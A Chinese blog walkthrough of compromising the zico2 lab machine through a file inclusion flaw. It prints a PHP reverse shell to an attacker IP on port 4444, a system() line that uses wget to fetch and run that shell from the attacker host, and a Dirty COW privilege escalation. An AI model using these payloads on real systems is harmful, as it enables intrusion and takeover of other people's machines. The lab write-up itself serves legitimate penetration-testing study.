zico2---文件包含漏洞

最新推荐文章于 2024-05-31 08:25:44 发布
最新推荐文章于 2024-05-31 08:25:44 发布
阅读量350 收藏 2
点赞数 1
分类专栏: kali 漏洞复现 文章标签: linux 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45671944/article/details/117880438
版权

漏洞复现过程

信息收集

目标靶机:zico2
主机发现
端口扫描
指纹探测
目录扫描

漏洞发现

漏洞利用

提权
总结

信息收集:一:主机发现
netdiscover -i eth0 -r 192.168.10.0/24
对同网段下的主机进行发现(也可使用namp -sV)
扫出目标IP为192.168.10.136
在这里插入图片描述(1为物理机的虚拟网卡,2为网关,254为边界)
二:端口扫描
masscan --rate =100000 --ports 0-65535 192.168.10.136
在这里插入图片描述
可使用 namp -sv -T4 -O -p 22,80 192.168.10.136 对端口进行扫描
三:指纹获取
whatweb http://192.168.10.136 可以查看主机的部分信息
四:目录扫描
dirb http://192.168.10.136 可以扫描主机目录文件
在这里插入图片描述
漏洞发现:
浏览器访问主机IP:在这里插入图片描述
使用burp suite抓包发现:存在文件包含漏洞在这里插入图片描述**漏洞利用:**访问网页下的bdadmin目录:

在这里插入图片描述
使用弱口令攻击发现,登录口令为:admin
在kali的HTML目录下创建shell脚本:
shell.txt:

<?php  $sock=fsockopen("192.168.10.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");?>

在这里插入图片描述
在此创建数据库,并将shell.php:<?php system("wget 192.168.10.128/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>写入(此处代码可将攻击者写好的shell.txt 下载并写入到靶机的shell.php 目录下)

访问创建好的数据库:在这里插入图片描述在KALI开启apache服务,并监听4444端口,发现可以进行登录访问

提权:可以使用python -c 'import pty;pty.spawn("/bin/bash")'创建终端
下一步可以使用脏牛提权:可以访问TMP目录,进行写操作,将dirty.c文件写入到tmp目录下
使用gcc -pthread dirty.c -o hacker -lcrypt编译dirty.c文件为hacker程序,在这里插入图片描述
并./hacher 运行此程序
su firefort 进行用户切换,至此,提权完成在这里插入图片描述
访问root目录下的flag文件,拿到flag在这里插入图片描述总结:文件包含漏洞在使用时,需与攻击者建立连接,并将攻击者的代码下载下来,在靶机上运行,可以利用此过程进行shell获取

jrdh1209
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
文件包含漏洞zico2靶机实战
随 风
06-28 279
一、原理 1、文件包含4 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用过程称为文件包含; 2、文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞; 二、文件包含漏洞常见函数 (1)require:找不到被包含的文件,报错,并且停止运行脚本; (2)include:找不到被包含的文件,只会报错; (3)require_once:与require类似,区别
文件包含漏洞
热门推荐
selecthch的博客
06-11 1万+
1、文件包含漏洞简介 1、1什么是文件包含          程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 ...
文件包含漏洞利用
qq_52072846的博客
02-28 3073
1.1实验目标 (1)通过本实验,通过远程文件包含漏洞包含远程 Webshell,从而Getshell 1.2实验原理 (1).文件包含函数加载的参数没有经过过滤或者严格定义,可以被用户控制,包含了其他恶意文件; 导致执行了非预期的代码。分类:本地文件包含和远程文件包含。 (2).可利用途径:读取敏感信息、远程包含shell、本地包含配合文件上传; (3).php伪协议 实验 1.本地文件包含(无视后缀); 原理 (1) include等函数通过动态执行变量的方式引入需要包含的文件 (
php文件包含漏洞利用
黑面狐
03-21 2687
上周我们部门弄了一个web安全的兴趣小组。说实话实在惭愧我虽然在安全公司每天都面对着各种漏洞,但是对渗透技术知之又少。于是加入兴趣小组后痛下决心好好学习渗透知识。 现在记录一下上周兴趣小组出的一个测试题目。由于0基础,花了两天时间才解决。 具体要求:读取网站根目录下的一个文本文件中的flag内容,具体的flag格式类似ahflag{xxxxxxxxxxxxxx} 好的,打开测试站点看看。
靶机渗透测试实战(六)——Zico2渗透实战
橘子女侠
05-11 6673
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
Zico-Shop.xmind
11-25
Zico-Shop.xmind
VMware的Zico2虚拟机
05-12
VMware的Zico2虚拟机
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
Zoomla!逐浪CMS2 x3.9.6.zip
07-16
5、升级:zico升级到v1.5,增加医疗行业图标。 6、修复:内容列表--如节点未允许内容页生成,则不会显示生成按钮 7、改进:内容发布过渡页效果 8、修复:内容列表--生成Html BUG,生成发布时,过滤未审核内容 9、增加:...
Zoomla!逐浪CMS 3.9.6.rar
05-24
逐浪CMS作为国内最大的.net平台CMS内容系统研发厂商,始终致力于为用户提供最优秀的网站内核与软件,并强调完全开放、绝不内嵌后门(包括强制升级提示与版权LOGO)、只专注于研发,多年来取得了包括CSDN在内的高端开发...
靶场渗透(五)——zico2渗透
Ramona的博客
08-10 580
测试环境 靶机:cizo2打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描ip,端口和服务,根据扫描结果可得 ip:192.168.111.138 端口及服务:22 ssh;80 http;111 渗透测试 • 访问网站,查看源码也没发现有价值的线索,爆破目录发现了敏感目录dbadmin且存在遍历漏洞 • 访问test_d...
文件包含漏洞详解
m0_55854679的博客
03-12 1万+
文章目录File Inclusion(文件包含)概述漏洞产生原因漏洞特点注小知识文件包含函数includerequireinclude_oncerequire_once文件包含示例pikachu靶场本地文件包含漏洞演示pikachu靶场远程文件包含漏洞演示文件包含漏洞的利用PHP伪协议(文件包含漏洞常用的利用方法)文件包含漏洞的防范措施phpMyadmin靶场练习 File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件
vulnhub渗透系列之zico2(内含zip提权和脏牛提权)
来到了学渣的博客
02-02 2128
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 我这个靶机总结了两种反弹shell和两种提权的方法(python反shell和zip提权、php反shell和 脏牛提权)并且有我错误的经验。希望能帮助到你们 实验过程总结 1.探测发现开放端口22、80、111端口,发现页面存在文件包含漏洞,dirb目...
Linux - 磁盘的分区和挂载
weixin_45735487的博客
05-27 751
逻辑分区只能在拓展分区上划分,编号5-15。拓展分区编号1-4,拓展分区不能格式化。rescue 恢复分区,对于误删的分区进行恢复,语法: rescue 起始 结束。rm 删除分区,后接要删除的分区编号。(L) 在主分区和拓展分区划分完之后,默认提示划分逻辑分区。n 进行磁盘分区,这里会默认MBR标签。(p) msdos下,会默认选择先划分主分区。
Linux】升级GCC(版本9.3),补充:binutils
yannan20190313的博客
05-27 803
Linux】升级GCC(版本9.3),补充:binutils
Linux】中常见的重要指令(下)以及重要的几个热键
2401_84568462的博客
05-27 1192
find指令查找的文件不能当前路径下(可以这样理解:如果要查找当前路径下可以使用ls指令,就不麻烦find指令了),必须查找当前路径下的目录里的文件。1.能被打包压缩的一定是由多个文件组成的,打包压缩后将文件变为一个整体,在传递给其他用户时不容易缺失。.tar打包后缀 .gz压缩后缀 XXX.tar.gz ----->XXX.tgz。功能:在系统特定的路径下查找,及可以找到可执行程序,有可以找到手册,安装包和压缩包等。命令在目录结构中搜索文件,并执行指定的操作。功能:在指令路径下搜索指令文件。
IMX6Q基于linux4.1.15调试音频芯片tas2505
qq_45147279的博客
05-29 158
获取时钟频率,因为我这边用的是外部晶振,不是使用CPU引脚MX6QDL_PAD_GPIO_0__CCM_CLKO1输出时钟的。如果上面of_match_table 的字符串跟设备树匹配上的话,接下来进入imx_tas2505_probe函数,这里我想说说设置ssi和audmux的方向问题,要么是由CPU输出BCLK,WCLK给音频芯片;tas2505_dai中的name变量名需要跟imx-tas2505.c中struct snd_soc_dai_link中的codec_dai_name变量名一样。
Linux】进程(1)
最新发布
qq_75000174的博客
05-31 854
父进程的代码和数据是从磁盘加载过来的,子进程的代码默认继承父进程的代码,数据我们后面会学:如果子进程没有写入,那父子进程的数据也是共享的,如果父子进程中有一个要对数据进行写入,那么会发生写时拷贝,数据就不共享了。所以,如果没有存储器(内存),那么一台电脑的成本就高,而高成本的东西是不利于广泛传播和使用的,所以内存的存在还是非常有必要的。第一行是我们所找的myprocess进程,第二行是我们使用grep命令所运行的进程,记得吗,我们前面讲的,在Linux中运行的大部分执行操作,本质都是运行进程。
Cannot read properties of undefined (reading 'gotoPage')
09-01
根据您提供的引用信息,报错信息提示是"Cannot read properties of undefined (reading 'gotoPage')"。这个错误通常出现在尝试从未定义的对象上读取属性时。可能的原因是,代码中某个对象未被正确初始化或赋值,导致无法访问该对象的属性。 要解决这个问题,您可以按照以下步骤进行排查和修复: 1. 首先,请确保代码中涉及到的对象都已经正确地初始化或赋值。检查相关代码,特别是与“gotoPage”属性相关的代码,确认是否正确地创建了该对象。 2. 确认您使用的变量或方法名称是否正确。在报错信息中,有时会提示某个属性或方法不存在,这可能是由于拼写错误或者是错误地引用了其他对象导致的。请仔细检查代码中涉及到的变量名或方法名。 3. 如果您在复制时间查询条件时遇到类似的错误,请确保变量名保持一致。根据引用中的原因分析,可能是由于复制时变量名出现了错误。 如果以上步骤都没有找到问题所在,建议您检查代码的上下文和运行环境,查看是否还有其他可能导致该错误的因素。<span class="em">1</span> #### 引用[.reference_title] - *1* [帆软填报CustomJSError报错解决](https://blog.csdn.net/zico_a/article/details/107150639)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值